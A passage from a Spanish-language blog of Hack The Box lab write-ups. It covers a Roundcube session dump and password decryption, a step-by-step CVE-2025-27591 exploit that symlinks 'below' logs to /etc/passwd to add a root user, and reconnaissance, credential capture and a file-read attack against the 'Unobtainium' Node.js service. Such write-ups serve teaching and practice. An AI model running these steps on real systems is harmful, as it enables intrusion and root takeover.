12:04:51 last_login: 2025-06-08 13:29:05 failed_login: NULL failed_login_counter: NULL language: en_US preferences: a:1:{s:11:\"client_hash\";s:16:\"GCrPGMkZvbsnc3xv\";} *************************** 3. row *************************** user_id: 3 username: tyler mail_host: localhost created: 2025-06-08 13:28:55 last_login: 2025-07-20 14:29:20 failed_login: 2025-06-11 07:51:22 failed_login_counter: 1 language: en_US preferences: a:1:{s:11:\"client_hash\";s:16:\"Y2Rz3HTwxwLJHevI\";} ``` ### Session Dump ```zsh mysql -u roundcube -p\"RCDBPass2025\" -h localhost roundcube -e 'use roundcube;select * from session;' -E ``` ```zsh sess_id: 6a5ktqih5uca6lj8vrmgh9v0oh changed: 2025-06-08 15:46:40 ip: 172.17.0.1 vars: bGFuZ3VhZ2V8czo1OiJlbl9VUyI7aW1hcF9uYW1lc3BhY2V8YTo0OntzOjg6InBlcnNvbmFsIjthOjE6e2k6MDthOjI6e2k6MDtzOjA6IiI7aToxO3M6MToiLyI7fX1zOjU6Im90aGVyIjtOO3M6Njoic2hhcmVkIjtOO3M6MTA6InByZWZpeF9vdXQiO3M6MDoiIjt9aW1hcF9kZWxpbWl0ZXJ8czoxOiIvIjtpbWFwX2xpc3RfY29uZnxhOjI6e2k6MDtOO2k6MTthOjA6e319dXNlcl9pZHxpOjE7dXNlcm5hbWV8czo1OiJqYWNvYiI7c3RvcmFnZV9ob3N0fHM6OToibG9jYWxob3N0IjtzdG9yYWdlX3BvcnR8aToxNDM7c3RvcmFnZV9zc2x8YjowO3Bhc3N3b3JkfHM6MzI6Ikw3UnYwMEE4VHV3SkFyNjdrSVR4eGNTZ25JazI1QW0vIjtsb2dpbl90aW1lfGk6MTc0OTM5NzExOTt0aW1lem9uZXxzOjEzOiJFdXJvcGUvTG9uZG9uIjtTVE9SQUdFX1NQRUNJQUwtVVNFfGI6MTthdXRoX3NlY3JldHxzOjI2OiJEcFlxdjZtYUk5SHhETDVHaGNDZDhKYVFRVyI7cmVxdWVzdF90b2tlbnxzOjMyOiJUSXNPYUFCQTF6SFNYWk9CcEg2dXA1WEZ5YXlOUkhhdyI7dGFza3xzOjQ6Im1haWwiO3NraW5fY29uZmlnfGE6Nzp7czoxNzoic3VwcG9ydGVkX2xheW91dHMiO2E6MTp7aTowO3M6MTA6IndpZGVzY3JlZW4iO31zOjIyOiJqcXVlcnlfdWlfY29sb3JzX3RoZW1lIjtzOjk6ImJvb3RzdHJhcCI7czoxODoiZW1iZWRfY3NzX2xvY2F0aW9uIjtzOjE3OiIvc3R5bGVzL2VtYmVkLmNzcyI7czoxOToiZWRpdG9yX2Nzc19sb2NhdGlvbiI7czoxNzoiL3N0eWxlcy9lbWJlZC5jc3MiO3M6MTc6ImRhcmtfbW9kZV9zdXBwb3J0IjtiOjE7czoyNjoibWVkaWFfYnJvd3Nlcl9jc3NfbG9jYXRpb24iO3M6NDoibm9uZSI7czoyMToiYWRkaXRpb25hbF9sb2dvX3R5cGVzIjthOjM6e2k6MDtzOjQ6ImRhcmsiO2k6MTtzOjU6InNtYWxsIjtpOjI7czoxMDoic21hbGwtZGFyayI7fX1pbWFwX2hvc3R8czo5OiJsb2NhbGhvc3QiO3BhZ2V8aToxO21ib3h8czo1OiJJTkJPWCI7c29ydF9jb2x8czowOiIiO3NvcnRfb3JkZXJ8czo0OiJERVNDIjtTVE9SQUdFX1RIUkVBRHxhOjM6e2k6MDtzOjEwOiJSRUZFUkVOQ0VTIjtpOjE7czo0OiJSRUZTIjtpOjI7czoxNDoiT1JERVJFRFNVQkpFQ1QiO31TVE9SQUdFX1FVT1RBfGI6MDtTVE9SQUdFX0xJU1QtRVhURU5ERUR8YjoxO2xpc3RfYXR0cmlifGE6Njp7czo0OiJuYW1lIjtzOjg6Im1lc3NhZ2VzIjtzOjI6ImlkIjtzOjExOiJtZXNzYWdlbGlzdCI7czo1OiJjbGFzcyI7czo0MjoibGlzdGluZyBtZXNzYWdlbGlzdCBzb3J0aGVhZGVyIGZpeGVkaGVhZGVyIjtzOjE1OiJhcmlhLWxhYmVsbGVkYnkiO3M6MjI6ImFyaWEtbGFiZWwtbWVzc2FnZWxpc3QiO3M6OToiZGF0YS1saXN0IjtzOjEyOiJtZXNzYWdlX2xpc3QiO3M6MTQ6ImRhdGEtbGFiZWwtbXNnIjtzOjE4OiJUaGUgbGlzdCBpcyBlbXB0eS4iO311bnNlZW5fY291bnR8YToyOntzOjU6IklOQk9YIjtpOjI7czo1OiJUcmFzaCI7aTowO31mb2xkZXJzfGE6MTp7czo1OiJJTkJPWCI7YToyOntzOjM6ImNudCI7aToyO3M6NjoibWF4dWlkIjtpOjM7fX1saXN0X21vZF9zZXF8czoyOiIxMCI7 ``` ### Decrypt https://gchq.github.io/CyberChef ```zsh From base64 username|s:5:\"jacob\"; password|s:32:\"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/ auth_secret|s:26:\"DpYqv6maI9HxDL5GhcCd8JaQQW\"; request_token|s:32:\"TIsOaABA1zHSXZOBpH6up5XFyayNRHaw\"; ``` En este punto me perdí, despues un tiempo recorde que habia visto un script llamado `decrypt.sh` solo se que lo vi al enumerar, asi que volvi a enumerar hasta encontrar el script. ```zsh tyler@mail:/var/www/html/roundcube/bin$ ./decrypt.sh L7Rv00A8TuwJAr67kITxxcSgnIk25Am/ 595mO8DmwGeD ``` ## Jacob Para validar si realmente es la contraseña logeamos como jacob. ![Image](image-6.png) Leemos el mail que tiene jacob. ``` Due to the recent change of policies your password has been changed. Please use the following credentials to log into your account: gY4Wr3a1evp4 Remember to change your password when you next log into your account. Thanks! ``` Ahora podemos logear con ssh. ``` We have been experiencing high resource consumption on our main server. For now we have enabled resource monitoring with Below and have granted you privileges to inspect the the logs. Please inform us immediately if you notice any irregularities. ``` https://csirt.telconet.net/comunicacion/noticias-seguridad/nueva-vulnerabilidad-detectada-en-la-herramienta-below-para-linux/ ## CVE-2025-27591 - PrivEsc ```zsh jacob@outbound:/tmp$ sudo -l Matching Defaults entries for jacob on outbound: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty User jacob may run the following commands on outbound: (ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d* ``` - Automated https://github.com/BridgerAlderson/CVE-2025-27591-PoC?tab=readme-ov-file - Manual https://security.opensuse.org/2025/03/12/below-world-writable-log-dir.html https://github.com/rvizx/CVE-2025-27591 ```zsh u=$(id -un) Eliminamos el archivo de registro original y prepáramos para colocar el enlace simbólico malicioso rm -f /var/log/below/error_$u.log Creamos un enlace simbólico para apuntar al archivo /etc/passwd hacia error_$u.log ln -sf /etc/passwd /var/log/below/error_$u.log Construimos una línea de usuario root falsa con el nombre de usuario pwned, sin contraseña (::), UID y GID son ambos 0, es decir, autoridad root. echo 'pwned::0:0:root:/root:/bin/bash' > /tmp/root_entry Escribimos la cuenta maliciosa en /etc/passwd (escritura indirecta a través de enlaces simbólicos). cat /tmp/root_entry > /var/log/below/error_$u.log Paso clave: ejecutar el siguiente comando, que escribe el registro en /var/log/below/error_$u.log con privilegios de root. En este punto, el contenido controlado por el atacante se escribe en /etc/passwd. sudo /usr/bin/below snapshot --begin now Intentamos iniciar sesión como root con el usuario pwn recién creado (UID 0) su pwned ``` *Se sobrescribe el /etc/passwd y se agrega un nuevo usuario con UID 0* ![Image](image-7.png)"},{"id":"unobtainium","title":"HTB - Unobtainium","description":"HTB - Unobtainium","date":"2025-07-14T00:00:00.000Z","tags":["HackTheBox","Hard","peirates","Kubernetes","POD","secrets","container","kubectl","pivoting","wireshark","LFI","RCE","Information","Leakage","Prototype-Pollution"],"authors":[],"url":"/blog/unobtainium","content":"## Box Info | Name | Unobtainium | | :-------------------- | ---------------: | | Release Date | 10 Apr, 2021 | | OS | Linux | | Rated Difficulty | Hard | ```zsh ping -c 3 10.10.10.235 PING 10.10.10.235 (10.10.10.235) 56(84) bytes of data. 64 bytes from 10.10.10.235: icmp_seq=1 ttl=63 time=131 ms 64 bytes from 10.10.10.235: icmp_seq=2 ttl=63 time=131 ms 64 bytes from 10.10.10.235: icmp_seq=3 ttl=63 time=131 ms ``` ## Recon ```zsh sudo nmap -p- --open --min-rate 5000 -n -vv -Pn 10.10.10.235 -oG allPorts ``` ```zsh ## Nmap 7.95 scan initiated Sun Jul 13 09:45:32 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p 22,80,8443,10250,10251,31337 -oN targeted 10.10.10.235 Nmap scan report for unobtainium.htb (10.10.10.235) Host is up (0.18s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Unobtainium 8443/tcp open ssl/http Golang net/http server | ssl-cert: Subject: commonName=k3s/organizationName=k3s | Subject Alternative Name: DNS:kubernetes, DNS:kubernetes.default, DNS:kubernetes.default.svc, DNS:kubernetes.default.svc.cluster.local, DNS:localhost, DNS:unobtainium, IP Address:10.10.10.235, IP Address:10.43.0.1, IP Address:127.0.0.1 | Not valid before: 2022-08-29T09:26:11 |_Not valid after: 2026-07-13T13:05:46 | http-auth: | HTTP/1.1 401 Unauthorized\\x0D |_ Server returned status 401 but no WWW-Authenticate header. |_http-title: Site doesn't have a title (application/json). | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 401 Unauthorized | Audit-Id: f81ec78b-7dd8-427c-a9be-312c71209ab8 | Cache-Control: no-cache, private | Content-Type: application/json | Date: Sun, 13 Jul 2025 13:45:47 GMT | Content-Length: 129 | {\"kind\":\"Status\",\"apiVersion\":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"Unauthorized\",\"reason\":\"Unauthorized\",\"code\":401} | GenericLines, Help, LPDString, RTSPRequest, SSLSessionReq: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 401 Unauthorized | Audit-Id: 1e4248ca-e27f-4cc0-a53c-688ef7ba115f | Cache-Control: no-cache, private | Content-Type: application/json | Date: Sun, 13 Jul 2025 13:45:46 GMT | Content-Length: 129 | {\"kind\":\"Status\",\"apiVersion\":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"Unauthorized\",\"reason\":\"Unauthorized\",\"code\":401} | HTTPOptions: | HTTP/1.0 401 Unauthorized | Audit-Id: af85cfb6-fedc-4e10-8884-3b9e972a5b3e | Cache-Control: no-cache, private | Content-Type: application/json | Date: Sun, 13 Jul 2025 13:45:47 GMT | Content-Length: 129 |_ {\"kind\":\"Status\",\"apiVersion\":\"v1\",\"metadata\":{},\"status\":\"Failure\",\"message\":\"Unauthorized\",\"reason\":\"Unauthorized\",\"code\":401} 10250/tcp open ssl/http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-title: Site doesn't have a title (text/plain; charset=utf-8). | ssl-cert: Subject: commonName=unobtainium | Subject Alternative Name: DNS:unobtainium, DNS:localhost, IP Address:127.0.0.1, IP Address:10.10.10.235 | Not valid before: 2022-08-29T09:26:11 |_Not valid after: 2026-07-13T13:05:46 10251/tcp open http Golang net/http server |_http-title: Site doesn't have a title (text/plain; charset=utf-8). | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 404 Not Found | Cache-Control: no-cache, private | Content-Type: text/plain; charset=utf-8 | X-Content-Type-Options: nosniff | Date: Sun, 13 Jul 2025 13:45:57 GMT | Content-Length: 19 | page not found | GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest, HTTPOptions: | HTTP/1.0 404 Not Found | Cache-Control: no-cache, private | Content-Type: text/plain; charset=utf-8 | X-Content-Type-Options: nosniff | Date: Sun, 13 Jul 2025 13:45:40 GMT | Content-Length: 19 | page not found | OfficeScan: | HTTP/1.1 400 Bad Request: missing required Host header | Content-Type: text/plain; charset=utf-8 | Connection: close |_ Request: missing required Host header 31337/tcp open http Node.js Express framework |_http-title: Site doesn't have a title (application/json; charset=utf-8). | http-methods: |_ Potentially risky methods: PUT DELETE 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8443-TCP:V=7.95%T=SSL%I=7%D=7/13%Time=6873B88A%P=x86_64-pc-linux-gn SF:u%r(GetRequest,14A,\"HTTP/1\\.0\\x20401\\x20Unauthorized\\r\\nAudit-Id:\\x201e SF:4248ca-e27f-4cc0-a53c-688ef7ba115f\\r\\nCache-Control:\\x20no-cache,\\x20pr SF:ivate\\r\\nContent-Type:\\x20application/json\\r\\nDate:\\x20Sun,\\x2013\\x20Ju SF:l\\x202025\\x2013:45:46\\x20GMT\\r\\nContent-Length:\\x20129\\r\\n\\r\\n{\\\"kind\\\" SF::\\\"Status\\\",\\\"apiVersion\\\":\\\"v1\\\",\\\"metadata\\\":{},\\\"status\\\":\\\"Failure\\ SF:\",\\\"message\\\":\\\"Unauthorized\\\",\\\"reason\\\":\\\"Unauthorized\\\",\\\"code\\\":401 SF:}\\n\")%r(HTTPOptions,14A,\"HTTP/1\\.0\\x20401\\x20Unauthorized\\r\\nAudit-Id:\\ SF:x20af85cfb6-fedc-4e10-8884-3b9e972a5b3e\\r\\nCache-Control:\\x20no-cache,\\ SF:x20private\\r\\nContent-Type:\\x20application/json\\r\\nDate:\\x20Sun,\\x2013\\ SF:x20Jul\\x202025\\x2013:45:47\\x20GMT\\r\\nContent-Length:\\x20129\\r\\n\\r\\n{\\\"k SF:ind\\\":\\\"Status\\\",\\\"apiVersion\\\":\\\"v1\\\",\\\"metadata\\\":{},\\\"status\\\":\\\"Fai SF:lure\\\",\\\"message\\\":\\\"Unauthorized\\\",\\\"reason\\\":\\\"Unauthorized\\\",\\\"code\\ SF:\":401}\\n\")%r(FourOhFourRequest,14A,\"HTTP/1\\.0\\x20401\\x20Unauthorized\\r\\ SF:nAudit-Id:\\x20f81ec78b-7dd8-427c-a9be-312c71209ab8\\r\\nCache-Control:\\x2 SF:0no-cache,\\x20private\\r\\nContent-Type:\\x20application/json\\r\\nDate:\\x20 SF:Sun,\\x2013\\x20Jul\\x202025\\x2013:45:47\\x20GMT\\r\\nContent-Length:\\x20129\\ SF:r\\n\\r\\n{\\\"kind\\\":\\\"Status\\\",\\\"apiVersion\\\":\\\"v1\\\",\\\"metadata\\\":{},\\\"sta SF:tus\\\":\\\"Failure\\\",\\\"message\\\":\\\"Unauthorized\\\",\\\"reason\\\":\\\"Unauthorize SF:d\\\",\\\"code\\\":401}\\n\")%r(GenericLines,67,\"HTTP/1\\.1\\x20400\\x20Bad\\x20Req SF:uest\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x2 SF:0close\\r\\n\\r\\n400\\x20Bad\\x20Request\")%r(RTSPRequest,67,\"HTTP/1\\.1\\x2040 SF:0\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\ SF:nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\")%r(Help,67,\"HTTP/1\\ SF:.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset= SF:utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\")%r(SSLSessi SF:onReq,67,\"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/p SF:lain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Req SF:uest\")%r(LPDString,67,\"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Ty SF:pe:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\ SF:x20Bad\\x20Request\"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port10251-TCP:V=7.95%I=7%D=7/13%Time=6873B883%P=x86_64-pc-linux-gnu%r(G SF:enericLines,67,\"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20 SF:text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\ SF:x20Request\")%r(GetRequest,D2,\"HTTP/1\\.0\\x20404\\x20Not\\x20Found\\r\\nCache SF:-Control:\\x20no-cache,\\x20private\\r\\nContent-Type:\\x20text/plain;\\x20ch SF:arset=utf-8\\r\\nX-Content-Type-Options:\\x20nosniff\\r\\nDate:\\x20Sun,\\x201 SF:3\\x20Jul\\x202025\\x2013:45:40\\x20GMT\\r\\nContent-Length:\\x2019\\r\\n\\r\\n404 SF:\\x20page\\x20not\\x20found\\n\")%r(HTTPOptions,D2,\"HTTP/1\\.0\\x20404\\x20Not\\ SF:x20Found\\r\\nCache-Control:\\x20no-cache,\\x20private\\r\\nContent-Type:\\x20 SF:text/plain;\\x20charset=utf-8\\r\\nX-Content-Type-Options:\\x20nosniff\\r\\nD SF:ate:\\x20Sun,\\x2013\\x20Jul\\x202025\\x2013:45:40\\x20GMT\\r\\nContent-Length: SF:\\x2019\\r\\n\\r\\n404\\x20page\\x20not\\x20found\\n\")%r(RTSPRequest,67,\"HTTP/1\\ SF:.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset= SF:utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\")%r(Help,67, SF:\"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20 SF:charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\")%r( SF:SSLSessionReq,67,\"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x SF:20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Ba SF:d\\x20Request\")%r(FourOhFourRequest,D2,\"HTTP/1\\.0\\x20404\\x20Not\\x20Found SF:\\r\\nCache-Control:\\x20no-cache,\\x20private\\r\\nContent-Type:\\x20text/pla SF:in;\\x20charset=utf-8\\r\\nX-Content-Type-Options:\\x20nosniff\\r\\nDate:\\x20 SF:Sun,\\x2013\\x20Jul\\x202025\\x2013:45:57\\x20GMT\\r\\nContent-Length:\\x2019\\r SF:\\n\\r\\n404\\x20page\\x20not\\x20found\\n\")%r(LPDString,67,\"HTTP/1\\.1\\x20400\\ SF:x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nC SF:onnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\")%r(SIPOptions,67,\"HTT SF:P/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20char SF:set=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\")%r(Sock SF:s5,67,\"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plai SF:n;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Reques SF:t\")%r(OfficeScan,A3,\"HTTP/1\\.1\\x20400\\x20Bad\\x20Request:\\x20missing\\x20 SF:required\\x20Host\\x20header\\r\\nContent-Type:\\x20text/plain;\\x20charset=u SF:tf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request:\\x20missing\\x SF:20required\\x20Host\\x20header\"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Jul 13 09:46:25 2025 -- 1 IP address (1 host up) scanned in 53.09 seconds ``` Hay varios certificados TLS que muestran nombres DNS de `unobtainium` e incluso se muestran nombres DNS como kubernetes. Agregaré tanto `unobtainium`a `unobtainium.htb`mi archivo local `/etc/hosts`. ```zsh echo \"10.10.10.235 unobtainium.htb unobtainium\" | sudo tee -a /etc/hosts ``` Los certificados que se muestran para el puerto 8443 estan relacionados con kubernetes. Aunque el propio nmap ya lo menciona, ya puedo intuir que hay una API de Kubernetes. ## HTTPS - Web ![Image](image.png) Con ``Ctrl + u`` podemos ver el codigo fuente ``` Unobtainium Simple, responsive, high availability, multi-platform chat application by Unobtainium Download deb Download rpm Download snap ``` Podemos ver archivos para descargar, que son los 3 enlaces que aparecen al entrar a la pagina web. `unzip unobtainium_debian.zip` ```zsh tree -L 3 . ├── opt │ └── unobtainium │ ├── chrome_100_percent.pak │ ├── chrome_200_percent.pak │ ├── chrome-sandbox │ ├── icudtl.dat │ ├── libEGL.so │ ├── libffmpeg.so │ ├── libGLESv2.so │ ├── libvk_swiftshader.so │ ├── libvulkan.so │ ├── LICENSE.electron.txt │ ├── LICENSES.chromium.html │ ├── locales │ ├── resources │ ├── resources.pak │ ├── snapshot_blob.bin │ ├── swiftshader │ ├── unobtainium │ ├── v8_context_snapshot.bin │ └── vk_swiftshader_icd.json └── usr └── share ├── applications ├── doc └── icons ``` ``` find . -executable . ./usr ./usr/share ./usr/share/doc ./usr/share/doc/unobtainium ./usr/share/applications ./usr/share/icons ./usr/share/icons/hicolor ./usr/share/icons/hicolor/128x128 ./usr/share/icons/hicolor/128x128/apps ./usr/share/icons/hicolor/16x16 ./usr/share/icons/hicolor/16x16/apps ./usr/share/icons/hicolor/32x32 ./usr/share/icons/hicolor/32x32/apps ./usr/share/icons/hicolor/256x256 ./usr/share/icons/hicolor/256x256/apps ./usr/share/icons/hicolor/64x64 ./usr/share/icons/hicolor/64x64/apps ./usr/share/icons/hicolor/48x48 ./usr/share/icons/hicolor/48x48/apps ./opt ./opt/unobtainium ./opt/unobtainium/swiftshader ./opt/unobtainium/swiftshader/libGLESv2.so ./opt/unobtainium/swiftshader/libEGL.so ./opt/unobtainium/libGLESv2.so ./opt/unobtainium/libvk_swiftshader.so ./opt/unobtainium/locales ./opt/unobtainium/resources ./opt/unobtainium/libEGL.so ./opt/unobtainium/unobtainium ./opt/unobtainium/chrome-sandbox ./opt/unobtainium/libvulkan.so ./opt/unobtainium/libffmpeg.so ``` ``./opt/unobtainium`` ``` ./unobtainium &> /dev/null & disown ``` ![Image](image-1.png) ### WireShark ```zsh wireshark 2>/dev/null & disown ``` Interceptaremos todo el trafico de la interfaz `tun0`, despues volvemos al unobtainium y recargamos el dashboard. ![Image](image-2.png) Vemos que se hace una peticion a la ip de unobtainium por el puerto 31337, si ingresamos a la web ![Image](image-3.png) Vemos un formato en JSON con un username. Vamos a interceptar las demas secciones del binario unobtainium para ver que podemos encontrar. Se esta enviando una peticion por POST, si damos follow -> TCP Stream, podemos ver mas informacion sobre la peticion. ![Image](image-4.png) Podemos ver que se estan enviando credenciales en texto plano. Bueno parece ser que la peticion intenta ver el archivo `todo.txt` por esta razon es que al autenticarse las credenciales viajan en texto plano. ```javascript GET / HTTP/1.1 Host: unobtainium.htb:31337 Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) unobtainium/1.0.0 Chrome/87.0.4280.141 Electron/11.2.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: en-US HTTP/1.1 200 OK X-Powered-By: Express Content-Type: application/json; charset=utf-8 Content-Length: 2 ETag: W/\"2-l9Fw4VUO7kr8CvBlt4zaMCqXZ0w\" Date: Sun, 13 Jul 2025 15:44:10 GMT Connection: keep-alive Keep-Alive: timeout=5 [] POST /todo HTTP/1.1 Host: unobtainium.htb:31337 Connection: keep-alive Content-Length: 73 Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) unobtainium/1.0.0 Chrome/87.0.4280.141 Electron/11.2.0 Safari/537.36 Content-Type: application/json Accept-Encoding: gzip, deflate Accept-Language: en-US {\"auth\":{\"name\":\"felamos\",\"password\":\"Winter2021\"},\"filename\":\"todo.txt\"} HTTP/1.1 200 OK X-Powered-By: Express Content-Type: application/json; charset=utf-8 Content-Length: 293 ETag: W/\"125-tNs2+nU0UiQGmLreBy4Pj891aVA\" Date: Sun, 13 Jul 2025 15:44:12 GMT Connection: keep-alive Keep-Alive: timeout=5 {\"ok\":true,\"content\":\"1. Create administrator zone.\\n2. Update node JS API Server.\\n3. Add Login functionality.\\n4. Complete Get Messages feature.\\n5. Complete ToDo feature.\\n6. Implement Google Cloud Storage function: https://cloud.google.com/storage/docs/json_api/v1\\n7. Improve security\\n\"} ``` ```zsh felamos:Winter2021 ``` Lo mismo podriamos obtener con curl, incluso podria ser que tengamos una via para hacer un ``Path Traversal`` en el campo \"filename\". ```zsh curl -s -X POST \"http://unobtainium.htb:31337/todo\" -d '{\"auth\":{\"name\":\"felamos\",\"password\":\"Winter2021\"},\"filename\":\"todo.txt\"}' -H \"Content-Type: application/json\" | jq { ``` ```zsh { \"ok\": true, \"content\": \"1. Create administrator zone.\\n2. Update node JS API Server.\\n3. Add Login functionality.\\n4. Complete Get Messages feature.\\n5. Complete ToDo feature.\\n6. Implement Google Cloud Storage function: https://cloud.google.com/storage/docs/json_api/v1\\n7. Improve security\\n\" } ``` Podriamos intentar con archivos comunes de ``.js``, porque el puerto 31337 es un servicio de node js framework. ```zsh curl -s -X POST \"http://unobtainium.htb:31337/todo\" -d '{\"auth\":{\"name\":\"felamos\",\"password\":\"Winter2021\"},\"filename\":\"index.js\"}' -H \"Content-Type: application/json\" | jq ``` ```zsh { \"ok\": true, \"content\": \"var root = require(\\\"google-cloudstorage-commands\\\");\\nconst express = require('express');\\nconst { exec } = require(\\\"child_process\\\");\\nconst bodyParser = require('body-parser');\\nconst _ = require('lodash');\\nconst app = express();\\nvar fs = require('fs');\\n\\nconst users = [\\n {name: 'felamos', password: 'Winter2021'},\\n {name: 'admin', password: Math.random().toString(32), canDelete: true, canUpload: true},\\n];\\n\\nlet messages = [];\\nlet lastId = 1;\\n\\nfunction findUser(auth) {\\n return users.find((u) =>\\n u.name === auth.name &&\\n u.password === auth.password);\\n}\\n\\napp.use(bodyParser.json());\\n\\napp.get('/', (req, res) => {\\n res.send(messages);\\n});\\n\\napp.put('/', (req, res) => {\\n const user = findUser(req.body.auth || {});\\n\\n if (!user) {\\n res.status(403).send({ok: false, error: 'Access denied'});\\n return;\\n }\\n\\n const message = {\\n icon: '__',\\n };\\n\\n _.merge(message, req.body.message, {\\n id: lastId++,\\n timestamp: Date.now(),\\n userName: user.name,\\n });\\n\\n messages.push(message);\\n res.send({ok: true});\\n});\\n\\napp.delete('/', (req, res) => {\\n const user = findUser(req.body.auth || {});\\n\\n if (!user || !user.canDelete) {\\n res.status(403).send({ok: false, error: 'Access denied'});\\n return;\\n }\\n\\n messages = messages.filter((m) => m.id !== req.body.messageId);\\n res.send({ok: true});\\n});\\napp.post('/upload', (req, res) => {\\n const user = findUser(req.body.auth || {});\\n if (!user || !user.canUpload) {\\n res.status(403).send({ok: false, error: 'Access denied'});\\n return;\\n }\\n\\n\\n filename = req.body.filename;\\n root.upload(\\\"./\\\",filename, true);\\n res.send({ok: true, Uploaded_File: filename});\\n});\\n\\napp.post('/todo', (req, res) => {\\n const user = findUser(req.body.auth || {});\\n if (!user) {\\n res.status(403).send({ok: false, error: 'Access denied'});\\n return;\\n }\\n\\n filename = req.body.filename;\\n testFolder = \\\"/usr/src/app\\\";\\n fs.readdirSync(testFolder).forEach(file => {\\n if (file.indexOf(filename) > -1) {\\n var buffer = fs.readFileSync(filename).toString();\\n res.send({ok: true, content: buffer});\\n }\\n });\\n});\\n\\napp.listen(3000);\\nconsole.log('Listening on port 3000...');\\n\" } ``` Guardamos en nvim y le damos un tratamiendo para leerlo mejor. ```js %s/\\\\n/\\r/g %s/\\\\t/\\t/g %s/\\\\\"/\\\"/g ``` ## ProtoType Pollution in Node js ProtoType Pollution es una vulnerabilidad de JavaScript que permite a un atacante agregar propiedades arbitrarias a los prototipos de objetos globales, que luego pueden ser heredados por objetos definidos por el usuario. Por ejemplo yo podria ```js \"content\": \"var root = require(\"google-cloudstorage-commands\"); const express = require('express'); const { exec } = require(\"child_process\"); const bodyParser = require('body-parser'); const _ = require('lodash'); const app = express(); var fs = require('fs'); const users = [ {name: 'felamos', password: 'Winter2021'}, {name: 'admin', password: Math.random().toString(32), canDelete: true, canUpload: true}, ]; let messages = []; let lastId = 1; function findUser(auth) { return users.find((u) => u.name === auth.name && u.password === auth.password); } app.use(bodyParser.json()); app.get('/', (req, res) => { res.send(messages); }); app.put('/', (req, res) => { const user = findUser(req.body.auth || {}); if (!user) { res.status(403).send({ok: false, error: 'Access denied'}); return; } const message = { icon: '__', }; _.merge(message, req.body.message, { id: lastId++, timestamp: Date.now(), userName: user.name, }); messages.push(message); res.send({ok: true}); }); app.delete('/', (req, res) => { const user = findUser(req.body.auth || {}); if (!user || !user.canDelete) { res.status(403).send({ok: false, error: 'Access denied'}); return; } messages = messages.filter((m) => m.id !== req.body.messageId); res.send({ok: true}); }); app.post('/upload', (req, res) => { const 